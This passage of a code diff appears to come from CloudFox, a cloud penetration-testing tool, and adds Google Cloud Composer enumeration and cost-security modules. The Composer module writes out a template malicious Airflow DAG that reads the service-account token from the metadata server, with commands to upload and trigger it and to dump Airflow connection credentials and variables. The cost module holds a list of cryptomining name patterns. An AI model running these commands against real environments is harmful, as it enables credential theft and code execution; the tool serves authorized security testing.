module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_COMPOSER_MODULE_NAME, m.processProject) + + allEnvironments := m.getAllEnvironments() + if len(allEnvironments) == 0 { + logger.InfoM("No Composer environments found", globals.GCP_COMPOSER_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicEnvs := 0 + for _, env := range allEnvironments { + if env.State == "RUNNING" { + running++ + } + if !env.PrivateEnvironment { + publicEnvs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Composer environment(s) (%d running, %d public)", + len(allEnvironments), running, publicEnvs), globals.GCP_COMPOSER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *ComposerModule) getAllEnvironments() []composerservice.EnvironmentInfo { + var all []composerservice.EnvironmentInfo + for _, envs := range m.ProjectEnvironments { + all = append(all, envs...) + } + return all +} + +func (m *ComposerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Composer in project: %s", projectID), globals.GCP_COMPOSER_MODULE_NAME) + } + + svc := composerservice.New() + environments, err := svc.ListEnvironments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_COMPOSER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Composer environments in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectEnvironments[projectID] = environments + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["composer-commands"] = &internal.LootFile{ + Name: "composer-commands", + Contents: "# Composer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, env := range environments { + m.addToLoot(projectID, env) + } + m.mu.Unlock() +} + +func (m *ComposerModule) addToLoot(projectID string, env composerservice.EnvironmentInfo) { + lootFile := m.LootMap[projectID]["composer-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# COMPOSER ENVIRONMENT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Private: %s\n", + env.Name, env.ProjectID, env.Location, + env.State, env.ServiceAccount, + shared.BoolToYesNo(env.PrivateEnvironment), + ) + + // === ENUMERATION COMMANDS === + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe environment: +gcloud composer environments describe %s --location=%s --project=%s + +# List DAGs: +gcloud composer environments run %s --location=%s --project=%s dags list + +# List Airflow connections (may contain credentials): +gcloud composer environments run %s --location=%s --project=%s connections list + +# List Airflow variables (may contain secrets): +gcloud composer environments run %s --location=%s --project=%s variables list + +# List Airflow pools: +gcloud composer environments run %s --location=%s --project=%s pools list + +# Show environment configuration: +gcloud composer environments describe %s --location=%s --project=%s --format=json | jq '.config' + +`, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + + // === DAG BUCKET COMMANDS === + if env.DagGcsPrefix != "" { + lootFile.Contents += fmt.Sprintf( + "# === DAG BUCKET COMMANDS ===\n\n"+ + "# List DAG files:\n"+ + "gsutil ls %s\n\n"+ + "# Download all DAGs for analysis:\n"+ + "gsutil -m cp -r %s /tmp/composer-dags-%s/\n\n"+ + "# Search DAGs for hardcoded credentials:\n"+ + "gsutil cat %s/*.py | grep -iE '(password|secret|token|key|credential)'\n\n", + env.DagGcsPrefix, + env.DagGcsPrefix, env.Name, + env.DagGcsPrefix, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // DAG upload for code execution (CRITICAL attack vector) + if env.DagGcsPrefix != "" { + lootFile.Contents += fmt.Sprintf( + "# Upload malicious DAG for code execution (runs as Composer SA: %s):\n"+ + "# Create a reverse shell DAG or credential harvester:\n"+ + "cat > /tmp/cloudfox_dag.py << 'DAGEOF'\n"+ + "from airflow import DAG\n"+ + "from airflow.operators.python import PythonOperator\n"+ + "from datetime import datetime\n"+ + "import subprocess, json\n"+ + "def exfil_metadata():\n"+ + " # Get SA token from metadata\n"+ + " result = subprocess.run(['curl', '-s', '-H', 'Metadata-Flavor: Google',\n"+ + " 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'],\n"+ + " capture_output=True, text=True)\n"+ + " print(json.loads(result.stdout))\n"+ + "dag = DAG('cloudfox_test', start_date=datetime(2024,1,1), schedule_interval=None)\n"+ + "task = PythonOperator(task_id='test', python_callable=exfil_metadata, dag=dag)\n"+ + "DAGEOF\n"+ + "gsutil cp /tmp/cloudfox_dag.py %s/cloudfox_dag.py\n\n"+ + "# Trigger the uploaded DAG:\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags trigger cloudfox_test\n\n"+ + "# Check DAG run status:\n"+ + "gcloud composer environments run %s --location=%s --project=%s dags list-runs -d cloudfox_test\n\n", + env.ServiceAccount, + env.DagGcsPrefix, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + } + + // Extract Airflow connection credentials + lootFile.Contents += fmt.Sprintf( + "# Dump Airflow connection credentials:\n"+ + "gcloud composer environments run %s --location=%s --project=%s connections list -- -o json\n\n"+ + "# Export specific connection details:\n"+ + "gcloud composer environments run %s --location=%s --project=%s connections get -- \n\n"+ + "# Dump all Airflow variables (may contain secrets):\n"+ + "gcloud composer environments run %s --location=%s --project=%s variables export -- /tmp/variables.json\n\n", + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + + // Airflow Web UI + if env.AirflowURI != "" { + lootFile.Contents += fmt.Sprintf( + "# Airflow Web UI (access via browser with authenticated session):\n"+ + "# %s\n\n", + env.AirflowURI, + ) + } + + lootFile.Contents += "\n" +} + +func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ComposerModule) getTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Service Account", + "SA Attack Paths", + "Private", + "Private Endpoint", + "Airflow URI", + "DAG Bucket", + "Image Version", + } +} + +func (m *ComposerModule) environmentsToTableBody(environments []composerservice.EnvironmentInfo) [][]string { + var body [][]string + for _, env := range environments { + sa := env.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "(default)" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + airflowURI := env.AirflowURI + if airflowURI == "" { + airflowURI = "-" + } + + dagBucket := env.DagGcsPrefix + if dagBucket == "" { + dagBucket = "-" + } + + imageVersion := env.ImageVersion + if imageVersion == "" { + imageVersion = "-" + } + + body = append(body, []string{ + m.GetProjectName(env.ProjectID), + env.ProjectID, + env.Name, + env.Location, + env.State, + sa, + attackPaths, + shared.BoolToYesNo(env.PrivateEnvironment), + shared.BoolToYesNo(env.EnablePrivateEndpoint), + airflowURI, + dagBucket, + imageVersion, + }) + } + return body +} + +func (m *ComposerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, environments := range m.ProjectEnvironments { + body := m.environmentsToTableBody(environments) + tableFiles := []internal.TableFile{{Name: "composer", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ComposerOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_COMPOSER_MODULE_NAME) + } +} + +func (m *ComposerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEnvironments := m.getAllEnvironments() + body := m.environmentsToTableBody(allEnvironments) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{Name: "composer", Header: m.getTableHeader(), Body: body}} + output := ComposerOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_COMPOSER_MODULE_NAME) + } +} diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go new file mode 100644 index 00000000..ee718aec --- /dev/null +++ b/gcp/commands/costsecurity.go @@ -0,0 +1,1171 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + "google.golang.org/api/sqladmin/v1beta4" + "google.golang.org/api/storage/v1" +) + +// Module name constant +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" + +var GCPCostSecurityCommand = &cobra.Command{ + Use: GCP_COSTSECURITY_MODULE_NAME, + Aliases: []string{"cost", "cost-anomaly", "orphaned", "cryptomining"}, + Hidden: true, + Short: "Identify cost anomalies, orphaned resources, and potential cryptomining activity", + Long: `Analyze resources for cost-related security issues and waste. + +Features: +- Detects potential cryptomining indicators (high CPU instances, GPUs) +- Identifies orphaned resources (unattached disks, unused IPs) +- Finds expensive idle resources +- Analyzes resource utilization patterns +- Identifies resources without cost allocation labels +- Detects unusual resource creation patterns + +Requires appropriate IAM permissions: +- roles/compute.viewer +- roles/storage.admin +- roles/cloudsql.viewer`, + Run: runGCPCostSecurityCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type CostAnomaly struct { + Name string + ProjectID string + ResourceType string + AnomalyType string // cryptomining, orphaned, idle, unlabeled, unusual-creation + Severity string + Details string + EstCostMonth float64 + CreatedTime string + Location string + Remediation string +} + +type OrphanedResource struct { + Name string + ProjectID string + ResourceType string + Location string + SizeGB int64 + Status string + CreatedTime string + EstCostMonth float64 + Reason string +} + +type ExpensiveResource struct { + Name string + ProjectID string + ResourceType string + Location string + MachineType string + VCPUs int64 + MemoryGB float64 + GPUs int + Status string + CreatedTime string + Labels map[string]string + EstCostMonth float64 +} + +type CryptominingIndicator struct { + Name string + ProjectID string + ResourceType string + Location string + Indicator string + Confidence string // HIGH, MEDIUM, LOW + Details string + CreatedTime string + Remediation string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CostSecurityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + CostAnomalies []CostAnomaly + Orphaned []OrphanedResource + Expensive []ExpensiveResource + Cryptomining []CryptominingIndicator + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + totalEstCost float64 + orphanedEstCost float64 + cryptoIndicators int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CostSecurityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CostSecurityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CostSecurityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCostSecurityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COSTSECURITY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &CostSecurityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CostAnomalies: []CostAnomaly{}, + Orphaned: []OrphanedResource{}, + Expensive: []ExpensiveResource{}, + Cryptomining: []CryptominingIndicator{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CostSecurityModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing resources for cost anomalies and security issues...", GCP_COSTSECURITY_MODULE_NAME) + + // Create service clients + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + return + } + + storageService, err := storage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Storage service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, storageService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Check results + totalFindings := len(m.CostAnomalies) + len(m.Orphaned) + len(m.Cryptomining) + if totalFindings == 0 { + logger.InfoM("No cost anomalies or security issues found", GCP_COSTSECURITY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d cost anomaly(ies), %d orphaned resource(s), %d cryptomining indicator(s)", + len(m.CostAnomalies), len(m.Orphaned), len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + + if len(m.Cryptomining) > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d potential cryptomining indicator(s) detected!", len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + } + + if m.orphanedEstCost > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Estimated monthly cost of orphaned resources: $%.2f", m.orphanedEstCost), GCP_COSTSECURITY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CostSecurityModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, storageService *storage.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing costs for project: %s", projectID), GCP_COSTSECURITY_MODULE_NAME) + } + + // Analyze compute instances + m.analyzeComputeInstances(ctx, projectID, computeService, logger) + + // Find orphaned disks + m.findOrphanedDisks(ctx, projectID, computeService, logger) + + // Find orphaned IPs + m.findOrphanedIPs(ctx, projectID, computeService, logger) + + // Analyze SQL instances + if sqlService != nil { + m.analyzeSQLInstances(ctx, projectID, sqlService, logger) + } + + // Analyze storage buckets + if storageService != nil { + m.analyzeStorageBuckets(ctx, projectID, storageService, logger) + } +} + +func (m *CostSecurityModule) analyzeComputeInstances(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, instanceList := range page.Items { + if instanceList.Instances == nil { + continue + } + for _, instance := range instanceList.Instances { + m.analyzeInstance(instance, projectID, m.extractZoneFromURL(zone), logger) + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate compute instances in project %s", projectID)) + } +} + +func (m *CostSecurityModule) analyzeInstance(instance *compute.Instance, projectID, zone string, logger internal.Logger) { + machineType := m.extractMachineTypeName(instance.MachineType) + vcpus, memGB := m.parseMachineType(machineType) + + // Count GPUs + gpuCount := 0 + for _, accel := range instance.GuestAccelerators { + gpuCount += int(accel.AcceleratorCount) + } + + // Check for cryptomining indicators + m.checkCryptominingIndicators(instance, projectID, zone, machineType, vcpus, memGB, gpuCount) + + // Check for expensive resources + estCost := m.estimateInstanceCost(machineType, vcpus, memGB, gpuCount) + if estCost > 500 { // Monthly threshold + expensive := ExpensiveResource{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + MachineType: machineType, + VCPUs: vcpus, + MemoryGB: memGB, + GPUs: gpuCount, + Status: instance.Status, + CreatedTime: instance.CreationTimestamp, + Labels: instance.Labels, + EstCostMonth: estCost, + } + + m.mu.Lock() + m.Expensive = append(m.Expensive, expensive) + m.totalEstCost += estCost + m.mu.Unlock() + } + + // Check for unlabeled resources + if len(instance.Labels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Instance has no cost allocation labels", + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: fmt.Sprintf("gcloud compute instances add-labels %s --labels=cost-center=UNKNOWN,owner=UNKNOWN --zone=%s --project=%s", instance.Name, zone, projectID), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for unusual creation times (off-hours) + m.checkUnusualCreation(instance, projectID, zone, estCost) +} + +func (m *CostSecurityModule) checkCryptominingIndicators(instance *compute.Instance, projectID, zone, machineType string, vcpus int64, memGB float64, gpuCount int) { + indicators := []CryptominingIndicator{} + + // Indicator 1: GPU instance + if gpuCount > 0 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "GPU_INSTANCE", + Confidence: "MEDIUM", + Details: fmt.Sprintf("Instance has %d GPU(s) attached", gpuCount), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance is authorized for GPU workloads", + } + indicators = append(indicators, indicator) + } + + // Indicator 2: High CPU count + if vcpus >= 32 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("Instance has %d vCPUs (high compute capacity)", vcpus), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance's CPU usage is legitimate", + } + indicators = append(indicators, indicator) + } + + // Indicator 3: Preemptible/Spot with high specs (common for mining) + if instance.Scheduling != nil && instance.Scheduling.Preemptible && (vcpus >= 8 || gpuCount > 0) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "PREEMPTIBLE_HIGH_SPEC", + Confidence: "MEDIUM", + Details: "Preemptible instance with high specs (common mining pattern)", + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this preemptible instance is used for legitimate batch processing", + } + indicators = append(indicators, indicator) + } + + // Indicator 4: Suspicious naming patterns + nameLower := strings.ToLower(instance.Name) + suspiciousPatterns := []string{"miner", "mining", "xmr", "monero", "btc", "ethereum", "eth", "crypto", "hash"} + for _, pattern := range suspiciousPatterns { + if strings.Contains(nameLower, pattern) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "SUSPICIOUS_NAME", + Confidence: "HIGH", + Details: fmt.Sprintf("Instance name contains suspicious pattern: %s", pattern), + CreatedTime: instance.CreationTimestamp, + Remediation: "Investigate this instance immediately for cryptomining", + } + indicators = append(indicators, indicator) + break + } + } + + // Indicator 5: N2D/C2 machine types (AMD EPYC - preferred for mining) + if strings.HasPrefix(machineType, "n2d-") || strings.HasPrefix(machineType, "c2-") { + if vcpus >= 16 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "AMD_HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("AMD EPYC instance with high CPU (%s)", machineType), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify legitimate use of AMD EPYC high-CPU instance", + } + indicators = append(indicators, indicator) + } + } + + // Add indicators to tracking + m.mu.Lock() + for _, ind := range indicators { + m.Cryptomining = append(m.Cryptomining, ind) + m.cryptoIndicators++ + + // Add to loot + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CRYPTOMINING INDICATOR: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s | Type: %s\n"+ + "# Investigate instance:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "# Stop instance if suspicious:\n"+ + "gcloud compute instances stop %s --zone=%s --project=%s\n\n", + ind.Name, + ind.ProjectID, + ind.Location, ind.Indicator, + ind.Name, ind.Location, ind.ProjectID, + ind.Name, ind.Location, ind.ProjectID, + ) + } + m.mu.Unlock() +} + +func (m *CostSecurityModule) checkUnusualCreation(instance *compute.Instance, projectID, zone string, estCost float64) { + createdTime, err := time.Parse(time.RFC3339, instance.CreationTimestamp) + if err != nil { + return + } + + // Check if created during unusual hours (midnight to 5am local, or weekends) + hour := createdTime.Hour() + weekday := createdTime.Weekday() + + if (hour >= 0 && hour <= 5) || weekday == time.Saturday || weekday == time.Sunday { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unusual-creation", + Severity: "MEDIUM", + Details: fmt.Sprintf("Instance created at unusual time: %s", createdTime.Format("Mon 2006-01-02 15:04")), + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: "Verify this instance creation was authorized", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } +} + +func (m *CostSecurityModule) findOrphanedDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + // Check if disk is attached to any instance + if len(disk.Users) == 0 { + estCost := m.estimateDiskCost(disk.SizeGb, disk.Type) + + orphaned := OrphanedResource{ + Name: disk.Name, + ProjectID: projectID, + ResourceType: "compute-disk", + Location: m.extractZoneFromURL(zone), + SizeGB: disk.SizeGb, + Status: disk.Status, + CreatedTime: disk.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Disk not attached to any instance", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + // Add cleanup command to loot + m.mu.Lock() + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ORPHANED DISK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Size: %dGB | Est. Cost: $%.2f/month\n"+ + "# Delete orphaned disk:\n"+ + "gcloud compute disks delete %s --zone=%s --project=%s\n\n", + disk.Name, + projectID, + disk.SizeGb, estCost, + disk.Name, m.extractZoneFromURL(zone), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) + } +} + +func (m *CostSecurityModule) findOrphanedIPs(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Global addresses + req := computeService.Addresses.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.AddressAggregatedList) error { + for region, addressList := range page.Items { + if addressList.Addresses == nil { + continue + } + for _, addr := range addressList.Addresses { + // Check if address is in use + if addr.Status == "RESERVED" && len(addr.Users) == 0 { + // Static IP costs ~$7.2/month when not in use + estCost := 7.2 + + orphaned := OrphanedResource{ + Name: addr.Name, + ProjectID: projectID, + ResourceType: "static-ip", + Location: m.extractRegionFromURL(region), + Status: addr.Status, + CreatedTime: addr.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Static IP reserved but not attached", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + m.mu.Lock() + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ORPHANED IP: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Address: %s | Est. Cost: $%.2f/month\n"+ + "# Release static IP:\n"+ + "gcloud compute addresses delete %s --region=%s --project=%s\n\n", + addr.Name, + projectID, + addr.Address, estCost, + addr.Name, m.extractRegionFromURL(region), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate addresses in project %s", projectID)) + } +} + +func (m *CostSecurityModule) analyzeSQLInstances(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances.Items { + // Check for stopped but still provisioned instances (still incur storage costs) + if instance.State == "SUSPENDED" { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "idle", + Severity: "MEDIUM", + Details: "Cloud SQL instance is suspended but still incurs storage costs", + Location: instance.Region, + Remediation: "Consider deleting if not needed, or start if needed for operations", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for high-tier instances without labels + if instance.Settings != nil && strings.Contains(instance.Settings.Tier, "db-custom") { + if instance.Settings.UserLabels == nil || len(instance.Settings.UserLabels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: fmt.Sprintf("High-tier Cloud SQL instance (%s) has no cost allocation labels", instance.Settings.Tier), + Location: instance.Region, + Remediation: fmt.Sprintf("gcloud sql instances patch %s --update-labels=cost-center=UNKNOWN,owner=UNKNOWN", instance.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +func (m *CostSecurityModule) analyzeStorageBuckets(ctx context.Context, projectID string, storageService *storage.Service, logger internal.Logger) { + buckets, err := storageService.Buckets.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_COSTSECURITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate storage buckets in project %s", projectID)) + return + } + + for _, bucket := range buckets.Items { + // Check for buckets without labels + if len(bucket.Labels) == 0 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Storage bucket has no cost allocation labels", + Location: bucket.Location, + Remediation: fmt.Sprintf("gsutil label ch -l cost-center:UNKNOWN gs://%s", bucket.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for multi-regional buckets with nearline/coldline (unusual pattern) + if bucket.StorageClass == "NEARLINE" || bucket.StorageClass == "COLDLINE" { + if strings.Contains(strings.ToUpper(bucket.Location), "DUAL") || len(bucket.Location) <= 4 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "suboptimal-config", + Severity: "LOW", + Details: fmt.Sprintf("Multi-regional bucket with %s storage (consider single region for cost)", bucket.StorageClass), + Location: bucket.Location, + Remediation: "Consider using single-region buckets for archival storage", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *CostSecurityModule) extractMachineTypeName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *CostSecurityModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) extractRegionFromURL(url string) string { + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] 